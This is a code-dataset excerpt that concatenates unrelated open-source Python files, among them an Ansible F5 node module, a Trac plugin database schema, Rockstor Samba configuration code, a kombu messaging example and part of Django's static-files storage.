monitor_state: "disabled"
partition: "Common"
name: "10.20.30.40"
'''
def node_exists(api, address):
# hack to determine if node exists
result = False
try:
api.LocalLB.NodeAddressV2.get_object_status(nodes=[address])
result = True
except bigsuds.OperationFailed as e:
if "was not found" in str(e):
result = False
else:
# genuine exception
raise
return result
def create_node_address(api, address, name):
try:
api.LocalLB.NodeAddressV2.create(
nodes=[name],
addresses=[address],
limits=[0]
)
result = True
desc = ""
except bigsuds.OperationFailed as e:
if "already exists" in str(e):
result = False
desc = "referenced name or IP already in use"
else:
# genuine exception
raise
return (result, desc)
def get_node_address(api, name):
return api.LocalLB.NodeAddressV2.get_address(nodes=[name])[0]
def delete_node_address(api, address):
try:
api.LocalLB.NodeAddressV2.delete_node_address(nodes=[address])
result = True
desc = ""
except bigsuds.OperationFailed as e:
if "is referenced by a member of pool" in str(e):
result = False
desc = "node referenced by pool"
else:
# genuine exception
raise
return (result, desc)
def set_node_description(api, name, description):
api.LocalLB.NodeAddressV2.set_description(nodes=[name],
descriptions=[description])
def get_node_description(api, name):
return api.LocalLB.NodeAddressV2.get_description(nodes=[name])[0]
def set_node_session_enabled_state(api, name, session_state):
session_state = "STATE_%s" % session_state.strip().upper()
api.LocalLB.NodeAddressV2.set_session_enabled_state(nodes=[name],
states=[session_state])
def get_node_session_status(api, name):
result = api.LocalLB.NodeAddressV2.get_session_status(nodes=[name])[0]
result = result.split("SESSION_STATUS_")[-1].lower()
return result
def set_node_monitor_state(api, name, monitor_state):
monitor_state = "STATE_%s" % monitor_state.strip().upper()
api.LocalLB.NodeAddressV2.set_monitor_state(nodes=[name],
states=[monitor_state])
def get_node_monitor_status(api, name):
result = api.LocalLB.NodeAddressV2.get_monitor_status(nodes=[name])[0]
result = result.split("MONITOR_STATUS_")[-1].lower()
return result
def get_monitors(api, name):
result = api.LocalLB.NodeAddressV2.get_monitor_rule(nodes=[name])[0]
monitor_type = result['type'].split("MONITOR_RULE_TYPE_")[-1].lower()
quorum = result['quorum']
monitor_templates = result['monitor_templates']
return (monitor_type, quorum, monitor_templates)
def set_monitors(api, name, monitor_type, quorum, monitor_templates):
monitor_type = "MONITOR_RULE_TYPE_%s" % monitor_type.strip().upper()
monitor_rule = {'type': monitor_type, 'quorum': quorum, 'monitor_templates': monitor_templates}
api.LocalLB.NodeAddressV2.set_monitor_rule(nodes=[name],
monitor_rules=[monitor_rule])
def main():
monitor_type_choices = ['and_list', 'm_of_n']
argument_spec = f5_argument_spec()
meta_args = dict(
session_state=dict(type='str', choices=['enabled', 'disabled']),
monitor_state=dict(type='str', choices=['enabled', 'disabled']),
name=dict(type='str', required=True),
host=dict(type='str', aliases=['address', 'ip']),
description=dict(type='str'),
monitor_type=dict(type='str', choices=monitor_type_choices),
quorum=dict(type='int'),
monitors=dict(type='list')
)
argument_spec.update(meta_args)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True
)
if module.params['validate_certs']:
import ssl
if not hasattr(ssl, 'SSLContext'):
module.fail_json(
msg='bigsuds does not support verifying certificates with python < 2.7.9. Either update python or set validate_certs=False on the task'
)
server = module.params['server']
server_port = module.params['server_port']
user = module.params['user']
password = module.params['password']
state = module.params['state']
partition = module.params['partition']
validate_certs = module.params['validate_certs']
session_state = module.params['session_state']
monitor_state = module.params['monitor_state']
host = module.params['host']
name = module.params['name']
address = fq_name(partition, name)
description = module.params['description']
monitor_type = module.params['monitor_type']
if monitor_type:
monitor_type = monitor_type.lower()
quorum = module.params['quorum']
monitors = module.params['monitors']
if monitors:
monitors = []
for monitor in module.params['monitors']:
monitors.append(fq_name(partition, monitor))
# sanity check user supplied values
if state == 'absent' and host is not None:
module.fail_json(msg="host parameter invalid when state=absent")
if monitors:
if len(monitors) == 1:
# set default required values for single monitor
quorum = 0
monitor_type = 'single'
elif len(monitors) > 1:
if not monitor_type:
module.fail_json(msg="monitor_type required for monitors > 1")
if monitor_type == 'm_of_n' and not quorum:
module.fail_json(msg="quorum value required for monitor_type m_of_n")
if monitor_type != 'm_of_n':
quorum = 0
elif monitor_type:
# no monitors specified but monitor_type exists
module.fail_json(msg="monitor_type require monitors parameter")
elif quorum is not None:
# no monitors specified but quorum exists
module.fail_json(msg="quorum requires monitors parameter")
try:
api = bigip_api(server, user, password, validate_certs, port=server_port)
result = {'changed': False} # default
if state == 'absent':
if node_exists(api, address):
if not module.check_mode:
deleted, desc = delete_node_address(api, address)
if not deleted:
module.fail_json(msg="unable to delete: %s" % desc)
else:
result = {'changed': True}
else:
# check-mode return value
result = {'changed': True}
elif state == 'present':
if not node_exists(api, address):
if host is None:
module.fail_json(msg="host parameter required when "
"state=present and node does not exist")
if not module.check_mode:
created, desc = create_node_address(api, address=host, name=address)
if not created:
module.fail_json(msg="unable to create: %s" % desc)
else:
result = {'changed': True}
if session_state is not None:
set_node_session_enabled_state(api, address,
session_state)
result = {'changed': True}
if monitor_state is not None:
set_node_monitor_state(api, address, monitor_state)
result = {'changed': True}
if description is not None:
set_node_description(api, address, description)
result = {'changed': True}
if monitors:
set_monitors(api, address, monitor_type, quorum, monitors)
else:
# check-mode return value
result = {'changed': True}
else:
# node exists -- potentially modify attributes
if host is not None:
if get_node_address(api, address) != host:
module.fail_json(msg="Changing the node address is "
"not supported by the API; "
"delete and recreate the node.")
if session_state is not None:
session_status = get_node_session_status(api, address)
if session_state == 'enabled' and \
session_status == 'forced_disabled':
if not module.check_mode:
set_node_session_enabled_state(api, address,
session_state)
result = {'changed': True}
elif session_state == 'disabled' and \
session_status != 'force_disabled':
if not module.check_mode:
set_node_session_enabled_state(api, address,
session_state)
result = {'changed': True}
if monitor_state is not None:
monitor_status = get_node_monitor_status(api, address)
if monitor_state == 'enabled' and \
monitor_status == 'forced_down':
if not module.check_mode:
set_node_monitor_state(api, address,
monitor_state)
result = {'changed': True}
elif monitor_state == 'disabled' and \
monitor_status != 'forced_down':
if not module.check_mode:
set_node_monitor_state(api, address,
monitor_state)
result = {'changed': True}
if description is not None:
if get_node_description(api, address) != description:
if not module.check_mode:
set_node_description(api, address, description)
result = {'changed': True}
if monitors:
t_monitor_type, t_quorum, t_monitor_templates = get_monitors(api, address)
if (t_monitor_type != monitor_type) or (t_quorum != quorum) or (set(t_monitor_templates) != set(monitors)):
if not module.check_mode:
set_monitors(api, address, monitor_type, quorum, monitors)
result = {'changed': True}
except Exception as e:
module.fail_json(msg="received exception: %s" % e)
module.exit_json(**result)
from ansible.module_utils.basic import *
from ansible.module_utils.f5_utils import *
if __name__ == '__main__':
main()
| gpl-3.0 |
filipefigcorreia/TracAdaptiveSoftwareArtifacts | AdaptiveArtifacts/persistence/db.py | 1 | 9434 | ## -*- coding: utf-8 -*-
#
# This software is licensed as described in the file license.txt, which
# you should have received as part of this distribution.
from trac.core import *
from trac.db import Table, Column, Index
from trac.db import DatabaseManager
from trac.env import IEnvironmentSetupParticipant
schema_version = 1
schema = [
Table('asa_version', key='id')[
Column('id', type='int64', auto_increment=True),
Column('time', type='int64'),
Column('author'),
Column('ipnr'),
Column('comment'),
Column('readonly', type='int'),
Index(['id'], unique=True),
],
# Workaround for sqlite not supporting multiple column primary keys with an auto-increment.
# This table as the sole purpose of getting the auto-increment values
Table('asa_artifact_id', key='id')[
Column('id', type='int64', auto_increment=True),
],
Table('asa_artifact', key=['id', 'version_id'])[
Column('id', type='int64'),
Column('version_id', type='int64'),
Column('spec'),
Column('title_expr'), # the "toString()" of artifacts
Index(['id', 'version_id'], unique=True),
],
Table('asa_artifact_value')[
Column('artifact_id', type='int64'),
Column('version_id', type='int64'),
Column('attr_name'),
Column('attr_value'),
Column('uiorder', type='int'),
Index(['artifact_id', 'version_id']),
],
# Keeps references of which artifacts are referenced by which pages
Table('asa_artifact_wiki_references', key=['artifact_id', 'artifact_version_id', 'page_name', 'page_version_id'])[
Column('artifact_id', type='int64'),
Column('artifact_version_id', type='int64'),
Column('page_name'),
Column('page_version_id', type='int'),
Column('ref_count', type='int64'),
Index(['artifact_id', 'artifact_version_id', 'page_name', 'page_version_id'], unique=True),
],
# Keeps references of which artifacts are referenced by which other artifacts' values
Table('asa_artifact_artifact_references', key=['artifact_id', 'artifact_version_id', 'related_artifact_id', 'related_artifact_version_id'])[
Column('artifact_id', type='int64'),
Column('artifact_version_id', type='int64'),
Column('related_artifact_id', type='int64'),
Column('related_artifact_version_id', type='int64'),
Column('ref_count', type='int64'),
Index(['artifact_id', 'artifact_version_id', 'related_artifact_id', 'related_artifact_version_id'], unique=True),
],
Table('asa_spec', key=['name', 'version_id'])[
Column('name'),
Column('version_id', type='int64'),
Column('base_class'),
Index(['name', 'version_id'], unique=True),
],
Table('asa_spec_attribute')[
Column('spec_name'),
Column('version_id', type='int64'),
Column('name'),
Column('multplicity_low'),
Column('multplicity_high'),
Column('type'),
Column('uiorder', type='int'),
Index(['spec_name', 'version_id']),
],
Table('asa_analytics')[
Column('resource_type'),
Column('resource_id'),
Column('operation'),
Column('username'),
Column('time'),
],
Table('asa_accurate_analytics', key=['id'])[
Column('id', type='int64', auto_increment=True),
Column('resource_type'),
Column('resource_id'),
Column('operation'),
Column('username'),
Column('time_started'),
Column('time_ended'),
Column('embedded_in_resource_type'),
Column('embedded_in_resource_id'),
],
]
class Setup(Component):
"""Installs, upgrades and uninstalls database support for the plugin."""
implements(IEnvironmentSetupParticipant)
def __init__(self):
super(Component, self).__init__()
from distutils import version
self.db_key = 'asa_plugin_database_version'
self.default_version = '0.0'
self.schema_version = version.StrictVersion(self._get_system_value(self.db_key) or self.default_version)
self.running_version = version.StrictVersion('0.5') # TODO: get this value from setup.py
# start IEnvironmentSetupParticipant methods
def environment_created(self):
self._install_asa_support()
def environment_needs_upgrade(self, db):
if self.schema_version == self.running_version:
return False
self.env.log.debug("The ASA plugin needs to upgrade the environment.")
return True
def upgrade_environment(self, db):
self.env.log.debug("The ASA plugin is upgrading the existing environment.")
try:
if self.schema_version == self.default_version:
self._install_asa_support()
elif self.schema_version in ('0.1', '0.2'):
self._upgrade_to_0dot3(db)
self._upgrade_to_0dot4(db)
self._upgrade_to_0dot5(db)
elif self.schema_version == '0.3':
self._upgrade_to_0dot4(db)
self._upgrade_to_0dot5(db)
elif self.schema_version == '0.4':
self._upgrade_to_0dot5(db)
# elif self.schema_version == 'XXXX':
# cursor = db.cursor()
# cursor.execute("UPDATE various stuff ...")
# cursor.execute("UPDATE system SET value=%s WHERE name='%s'" % (self.db_key, self.running_version))
# self.log.info('Upgraded ASA tables from version %s to %s' % (self.db_key, self.running_version))
except Exception as e:
self.env.log.debug("Error while upgrading the environment.\n" + str(e))
finally:
pass
#self.env.log.error(traceback.format_exc())
# end IEnvironmentSetupParticipant methods
def _install_asa_support(self):
self.env.log.debug("Adding support for the ASA plugin.")
cnx = self.env.get_db_cnx()
cursor = cnx.cursor()
cursor.execute("INSERT INTO system (name, value) VALUES ('%s', '%s')" %
(self.db_key, str(self.running_version)))
for table in schema: # TODO: fix. reference to global var
self._create_table(table, cursor)
self.schema_version = self.running_version
# 0.1 -> 0.3
def _upgrade_to_0dot3(self, db):
cursor = db.cursor()
cursor.execute("ALTER TABLE asa_artifact_wiki RENAME TO asa_artifact_wiki_references;")
for table in schema: # TODO: fix. reference to global var
if table.name == "asa_artifact_artifact_references":
self._create_table(table, cursor)
break
from AdaptiveArtifacts.persistence.data import DBPool
from AdaptiveArtifacts.model.pool import InstancePool
from AdaptiveArtifacts.model.core import Instance
dbp = DBPool(self.env, InstancePool())
dbp.load_specs()
dbp.load_artifacts_of(Instance.get_name())
for artifact in dbp.pool.get_instances_of(Instance.get_name()):
dbp.update_artifact_ref_count(artifact, db)
cursor.execute("UPDATE system SET value='0.3' WHERE name='%s'" % (self.db_key,))
self.log.info('Upgraded ASA tables from versions 0.1/0.2 to 0.3')
# 0.3 -> 0.4
def _upgrade_to_0dot4(self, db):
cursor = db.cursor()
for table in schema: # TODO: fix. reference to global var
if table.name in ("asa_analytics", "asa_accurate_analytics"):
self._create_table(table, cursor)
cursor.execute("UPDATE system SET value='0.4' WHERE name='%s'" % (self.db_key,))
self.log.info('Upgraded ASA tables from version 0.3 to 0.4')
def _upgrade_to_0dot5(self, db):
cursor = db.cursor()
for table in schema: # TODO: fix. reference to global var
if table.name in ("asa_accurate_analytics"):
for column in table.columns:
if column.name in ["embedded_in_resource_type", "embedded_in_resource_id"]:
cursor.execute("ALTER TABLE asa_accurate_analytics ADD COLUMN '%s' text" % (column.name,))
cursor.execute("UPDATE system SET value='0.5' WHERE name='%s'" % (self.db_key,))
self.log.info('Upgraded ASA tables from version 0.4 to 0.5')
def _create_table(self, table, cursor):
connector, _ = DatabaseManager(self.env)._get_connector()
for stmt in connector.to_sql(table):
self.env.log.debug("Running query: \n %s" % stmt)
cursor.execute(stmt)
def _get_system_value(self, key):
return self._get_scalar_value("SELECT value FROM system WHERE name=%s", 0, key)
def _get_scalar_value(self, query, col=0, *params):
data = self._get_first_row(query, *params)
if data:
return data[col]
else:
return None
def _get_first_row(self, query, *params):
cursor = self.env.get_db_cnx().cursor()
data = None
try:
cursor.execute(query, params)
data = cursor.fetchone()
except Exception, e:
self.env.log.exception(
'There was a problem executing sql: %s \n \
with parameters: %s\n \
Exception: %s' % (query, params, e))
cursor.connection.rollback()
return data | bsd-3-clause |
vyrus/wubi | src/main.py | 6 | 1338 | #!/usr/bin/env python
#
# Copyright (c) 2008 Agostino Russo
#
# Written by Agostino Russo <agostino.russo@gmail.com>
#
# This file is part of Wubi the Win32 Ubuntu Installer.
#
# Wubi is free software; you can redistribute it and/or modify
# it under 5the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation; either version 2.1 of
# the License, or (at your option) any later version.
#
# Wubi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# once compiled and packaged by pypack,
# all dependencies will be in ./lib,
# so let's add ./lib to the path
import sys
import os
root_dir = os.path.abspath(os.path.dirname(__file__))
lib_dir = os.path.join(root_dir, 'lib')
sys.path.insert(0, lib_dir)
from wubi.application import Wubi
try:
from version import application_name, version, revision
except:
application_name = "wubi"
version = "0.0"
revision = "0"
application = Wubi(application_name, version, revision, root_dir)
application.run()
| gpl-2.0 |
2deviant/Mathematica-Trees | trees.py | 1 | 2017 | import converters
import math
import random
import sys
def random_real(a, b):
"""
Random real between a and b inclusively.
"""
return a + random.random() * (b - a)
def branch_length(depth):
"""
Somewhat random length of the branch. Play around
with this to achieve a desired tree structure.
"""
return math.log(depth) * random_real(.5, 1)
def branch_angle(initial_lean, max_lean):
"""
Somewhat random angle of the branch. Play around
with this to achieve a desired tree structure.
"""
return initial_lean + max_lean * random_real(-.5, .5)
def branches(x0, y0, depth, nfurcation, max_lean, initial_lean):
"""
Make a tree!
"""
# maximum depth achieved, stop adding branches
# maybe add a fruit or flower here
if not depth:
return []
angle = branch_angle(initial_lean, max_lean)
length = branch_length(depth)
# branch is the line segment (x0, y0) - (x1, y0)
x1 = x0 + length*math.sin(angle)
y1 = y0 + length*math.cos(angle)
# construct the branch
# the depth -- or inverse height -- is stored so that the
# rendering code can use it to vary the thickness of the
# branches, color, etc.
new_branches = [[depth, [[x0, y0], [x1, y1]]]]
# number of branches
n = random.randint(1, nfurcation)
# branches growing out of this branch
for _ in xrange(n):
# angle of the current branch becomes the initial lean
new_branches.extend(
branches(x1, y1, depth-1, nfurcation, max_lean, angle)
)
return new_branches
def main():
tree = branches(
# origin
0, 0,
# 11 branches from trunk to crown
11,
# at each juncture, there's either 1 or 2 branches
2,
# the branch can deviate 90/2=45 degrees in either direction
math.pi/2,
# initial lean [bias] is zero degrees
0
)
print(converters.to_mathematica(tree))
if __name__ == '__main__':
main()
| mit |
priyaganti/rockstor-core | src/rockstor/system/samba.py | 2 | 9534 | """
Copyright (c) 2012-2014 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from osi import run_command
from services import service_status
import shutil
from tempfile import mkstemp
import re
import os
from storageadmin.models import SambaCustomConfig
from django.conf import settings
TESTPARM = '/usr/bin/testparm'
SMB_CONFIG = '/etc/samba/smb.conf'
SYSTEMCTL = '/usr/bin/systemctl'
CHMOD = '/bin/chmod'
RS_SHARES_HEADER = '####BEGIN: Rockstor SAMBA CONFIG####'
RS_SHARES_FOOTER = '####END: Rockstor SAMBA CONFIG####'
RS_AD_HEADER = '####BEGIN: Rockstor ACTIVE DIRECTORY CONFIG####'
RS_AD_FOOTER = '####END: Rockstor ACTIVE DIRECTORY CONFIG####'
RS_CUSTOM_HEADER = '####BEGIN: Rockstor SAMBA GLOBAL CUSTOM####'
RS_CUSTOM_FOOTER = '####END: Rockstor SAMBA GLOBAL CUSTOM####'
def test_parm(config='/etc/samba/smb.conf'):
cmd = [TESTPARM, '-s', config]
o, e, rc = run_command(cmd, throw=False)
if (rc != 0):
raise Exception('Syntax error while checking the temporary '
'samba config file')
return True
def rockstor_smb_config(fo, exports):
mnt_helper = os.path.join(settings.ROOT_DIR, 'bin/mnt-share')
fo.write('%s\n' % RS_SHARES_HEADER)
for e in exports:
admin_users = ''
for au in e.admin_users.all():
admin_users = '%s%s ' % (admin_users, au.username)
fo.write('[%s]\n' % e.share.name)
fo.write(' root preexec = "%s %s"\n' % (mnt_helper, e.share.name))
fo.write(' root preexec close = yes\n')
fo.write(' comment = %s\n' % e.comment.encode('utf-8'))
fo.write(' path = %s\n' % e.path)
fo.write(' browseable = %s\n' % e.browsable)
fo.write(' read only = %s\n' % e.read_only)
fo.write(' guest ok = %s\n' % e.guest_ok)
if (len(admin_users) > 0):
fo.write(' admin users = %s\n' % admin_users)
if (e.shadow_copy):
fo.write(' shadow:format = .' + e.snapshot_prefix + '_%Y%m%d%H%M\n') # noqa E501
fo.write(' shadow:basedir = %s\n' % e.path)
fo.write(' shadow:snapdir = ./\n')
fo.write(' shadow:sort = desc\n')
fo.write(' shadow:localtime = yes\n')
fo.write(' vfs objects = shadow_copy2\n')
fo.write(' veto files = /.%s*/\n' % e.snapshot_prefix)
for cco in SambaCustomConfig.objects.filter(smb_share=e):
if (cco.custom_config.strip()):
fo.write(' %s\n' % cco.custom_config)
fo.write('%s\n' % RS_SHARES_FOOTER)
def refresh_smb_config(exports):
fh, npath = mkstemp()
with open(SMB_CONFIG) as sfo, open(npath, 'w') as tfo:
rockstor_section = False
for line in sfo.readlines():
if (re.match(RS_SHARES_HEADER, line) is not None):
rockstor_section = True
rockstor_smb_config(tfo, exports)
break
else:
tfo.write(line)
if (rockstor_section is False):
rockstor_smb_config(tfo, exports)
test_parm(npath)
shutil.move(npath, SMB_CONFIG)
# write out new [global] section and re-write the existing rockstor section.
def update_global_config(smb_config=None, ad_config=None):
fh, npath = mkstemp()
if (smb_config is None):
smb_config = {}
with open(SMB_CONFIG) as sfo, open(npath, 'w') as tfo:
# Start building samba [global] section with base config
tfo.write('[global]\n')
# Write some defaults samba params
# only if not passed via samba custom config
smb_default_options = {
'log file': '/var/log/samba/log.%m',
'log level': 3,
'load printers': 'no',
'cups options': 'raw',
'printcap name': '/dev/null',
'map to guest': 'Bad User'
}
for key, value in smb_default_options.iteritems():
if key not in smb_config:
tfo.write(' %s = %s\n' % (key, value))
# Fill samba [global] section with our custom samba params
# before updating smb_config dict with AD data to avoid
# adding non samba params like AD username and password
if (smb_config is not None):
tfo.write('\n%s\n' % RS_CUSTOM_HEADER)
for k in smb_config:
if (ad_config is not None and k == 'workgroup'):
tfo.write(' %s = %s\n' % (k, ad_config[k]))
continue
tfo.write(' %s = %s\n' % (k, smb_config[k]))
tfo.write('%s\n\n' % RS_CUSTOM_FOOTER)
# Next add AD config to smb_config and build AD section
if (ad_config is not None):
smb_config.update(ad_config)
domain = smb_config.pop('domain', None)
if (domain is not None):
idmap_high = int(smb_config['idmap_range'].split()[2])
default_range = '%s - %s' % (idmap_high + 1, idmap_high + 1000000)
workgroup = ad_config['workgroup']
tfo.write('%s\n' % RS_AD_HEADER)
tfo.write(' security = ads\n')
tfo.write(' realm = %s\n' % domain)
tfo.write(' template shell = /bin/sh\n')
tfo.write(' kerberos method = secrets and keytab\n')
tfo.write(' winbind use default domain = false\n')
tfo.write(' winbind offline logon = true\n')
tfo.write(' winbind enum users = yes\n')
tfo.write(' winbind enum groups = yes\n')
tfo.write(' idmap config * : backend = tdb\n')
tfo.write(' idmap config * : range = %s\n' % default_range)
# enable rfc2307 schema and collect UIDS from AD DC we assume if
# rfc2307 then winbind nss info too - collects AD DC home and shell
# for each user
if (smb_config.pop('rfc2307', None)):
tfo.write(' idmap config %s : backend = ad\n' % workgroup)
tfo.write(' idmap config %s : range = %s\n' %
(workgroup, smb_config['idmap_range']))
tfo.write(' idmap config %s : schema_mode = rfc2307\n'
% workgroup)
tfo.write(' winbind nss info = rfc2307\n')
else:
tfo.write(' idmap config %s : backend = rid\n' % workgroup)
tfo.write(' idmap config %s : range = %s\n' %
(workgroup, smb_config['idmap_range']))
tfo.write('%s\n\n' % RS_AD_FOOTER)
# After default [global], custom [global] and AD writes
# finally add smb shares
rockstor_section = False
for line in sfo.readlines():
if (re.match(RS_SHARES_HEADER, line) is not None):
rockstor_section = True
if (rockstor_section is True):
tfo.write(line)
test_parm(npath)
shutil.move(npath, SMB_CONFIG)
def get_global_config():
config = {}
with open(SMB_CONFIG) as sfo:
global_section = False
global_custom_section = False
for l in sfo.readlines():
# Check one, entering smb.conf [global] section
if (re.match('\[global]', l) is not None):
global_section = True
continue
# Check two, entering Rockstor custome params section under
# [global]
if (re.match(RS_CUSTOM_HEADER, l) is not None):
global_custom_section = True
continue
if ((global_custom_section and
re.match(RS_CUSTOM_FOOTER, l) is not None)):
global_custom_section = False
continue
# we ignore lines outside [global], empty lines, or
# commends(starting with # or ;)
if ((not global_section or
not global_custom_section or
len(l.strip()) == 0 or
re.match('#', l) is not None or
re.match(';', l) is not None)):
continue
if (global_section and re.match('\[', l) is not None):
global_section = False
continue
fields = l.strip().split(' = ')
if len(fields) < 2:
continue
config[fields[0].strip()] = fields[1].strip()
return config
def restart_samba(hard=False):
"""
call whenever config is updated
"""
mode = 'reload'
if (hard):
mode = 'restart'
run_command([SYSTEMCTL, mode, 'smb'])
return run_command([SYSTEMCTL, mode, 'nmb'])
def update_samba_discovery():
avahi_smb_config = '/etc/avahi/services/smb.service'
if (os.path.isfile(avahi_smb_config)):
os.remove(avahi_smb_config)
return run_command([SYSTEMCTL, 'restart', 'avahi-daemon', ])
def status():
return service_status('smb')
| gpl-3.0 |
waseem18/oh-mainline | vendor/packages/kombu/examples/simple_eventlet_send.py | 24 | 1150 | """
Example that sends a single message and exits using the simple interface.
You can use `simple_receive.py` (or `complete_receive.py`) to receive the
message sent.
"""
import eventlet
from kombu import Connection
eventlet.monkey_patch()
def send_many(n):
#: Create connection
#: If hostname, userid, password and virtual_host is not specified
#: the values below are the default, but listed here so it can
#: be easily changed.
with Connection('amqp://guest:guest@localhost:5672//') as connection:
#: SimpleQueue mimics the interface of the Python Queue module.
#: First argument can either be a queue name or a kombu.Queue object.
#: If a name, then the queue will be declared with the name as the
#: queue name, exchange name and routing key.
with connection.SimpleQueue('kombu_demo') as queue:
def send_message(i):
queue.put({'hello': 'world%s' % (i, )})
pool = eventlet.GreenPool(10)
for i in range(n):
pool.spawn(send_message, i)
pool.waitall()
if __name__ == '__main__':
send_many(10)
| agpl-3.0 |
lepture/flask-oauthlib | flask_oauthlib/utils.py | 2 | 1784 | # coding: utf-8
import base64
from flask import request, Response
from oauthlib.common import to_unicode, bytes_type
def _get_uri_from_request(request):
"""
The uri returned from request.uri is not properly urlencoded
(sometimes it's partially urldecoded) This is a weird hack to get
werkzeug to return the proper urlencoded string uri
"""
uri = request.base_url
if request.query_string:
uri += '?' + request.query_string.decode('utf-8')
return uri
def extract_params():
"""Extract request params."""
uri = _get_uri_from_request(request)
http_method = request.method
headers = dict(request.headers)
if 'wsgi.input' in headers:
del headers['wsgi.input']
if 'wsgi.errors' in headers:
del headers['wsgi.errors']
# Werkzeug, and subsequently Flask provide a safe Authorization header
# parsing, so we just replace the Authorization header with the extraced
# info if it was successfully parsed.
if request.authorization:
headers['Authorization'] = request.authorization
body = request.form.to_dict()
return uri, http_method, body, headers
def to_bytes(text, encoding='utf-8'):
"""Make sure text is bytes type."""
if not text:
return text
if not isinstance(text, bytes_type):
text = text.encode(encoding)
return text
def decode_base64(text, encoding='utf-8'):
"""Decode base64 string."""
text = to_bytes(text, encoding)
return to_unicode(base64.b64decode(text), encoding)
def create_response(headers, body, status):
"""Create response class for Flask."""
response = Response(body or '')
for k, v in headers.items():
response.headers[str(k)] = v
response.status_code = status
return response
| bsd-3-clause |
yrobla/nova | contrib/boto_v6/__init__.py | 52 | 1693 | # Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
def connect_ec2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Amazon's EC2
"""
from boto_v6.ec2.connection import EC2ConnectionV6
return EC2ConnectionV6(aws_access_key_id, aws_secret_access_key, **kwargs)
| apache-2.0 |
vongochung/buiquocviet | django/contrib/staticfiles/storage.py | 66 | 11181 | from __future__ import with_statement
import hashlib
import os
import posixpath
import re
from urllib import unquote
from urlparse import urlsplit, urlunsplit, urldefrag
from django.conf import settings
from django.core.cache import (get_cache, InvalidCacheBackendError,
cache as default_cache)
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.utils.datastructures import SortedDict
from django.utils.encoding import force_unicode, smart_str
from django.utils.functional import LazyObject
from django.utils.importlib import import_module
from django.contrib.staticfiles.utils import check_settings, matches_patterns
class StaticFilesStorage(FileSystemStorage):
"""
Standard file system storage for static files.
The defaults for ``location`` and ``base_url`` are
``STATIC_ROOT`` and ``STATIC_URL``.
"""
def __init__(self, location=None, base_url=None, *args, **kwargs):
if location is None:
location = settings.STATIC_ROOT
if base_url is None:
base_url = settings.STATIC_URL
check_settings(base_url)
super(StaticFilesStorage, self).__init__(location, base_url,
*args, **kwargs)
def path(self, name):
if not self.location:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_ROOT "
"setting to a filesystem path.")
return super(StaticFilesStorage, self).path(name)
class CachedFilesMixin(object):
patterns = (
("*.css", (
r"""(url\(['"]{0,1}\s*(.*?)["']{0,1}\))""",
r"""(@import\s*["']\s*(.*?)["'])""",
)),
)
def __init__(self, *args, **kwargs):
super(CachedFilesMixin, self).__init__(*args, **kwargs)
try:
self.cache = get_cache('staticfiles')
except InvalidCacheBackendError:
# Use the default backend
self.cache = default_cache
self._patterns = SortedDict()
for extension, patterns in self.patterns:
for pattern in patterns:
compiled = re.compile(pattern)
self._patterns.setdefault(extension, []).append(compiled)
def hashed_name(self, name, content=None):
parsed_name = urlsplit(unquote(name))
clean_name = parsed_name.path.strip()
if content is None:
if not self.exists(clean_name):
raise ValueError("The file '%s' could not be found with %r." %
(clean_name, self))
try:
content = self.open(clean_name)
except IOError:
# Handle directory paths and fragments
return name
path, filename = os.path.split(clean_name)
root, ext = os.path.splitext(filename)
# Get the MD5 hash of the file
md5 = hashlib.md5()
for chunk in content.chunks():
md5.update(chunk)
md5sum = md5.hexdigest()[:12]
hashed_name = os.path.join(path, u"%s.%s%s" %
(root, md5sum, ext))
unparsed_name = list(parsed_name)
unparsed_name[2] = hashed_name
# Special casing for a @font-face hack, like url(myfont.eot?#iefix")
# http://www.fontspring.com/blog/the-new-bulletproof-font-face-syntax
if '?#' in name and not unparsed_name[3]:
unparsed_name[2] += '?'
return urlunsplit(unparsed_name)
def cache_key(self, name):
return u'staticfiles:%s' % hashlib.md5(smart_str(name)).hexdigest()
def url(self, name, force=False):
"""
Returns the real URL in DEBUG mode.
"""
if settings.DEBUG and not force:
hashed_name, fragment = name, ''
else:
clean_name, fragment = urldefrag(name)
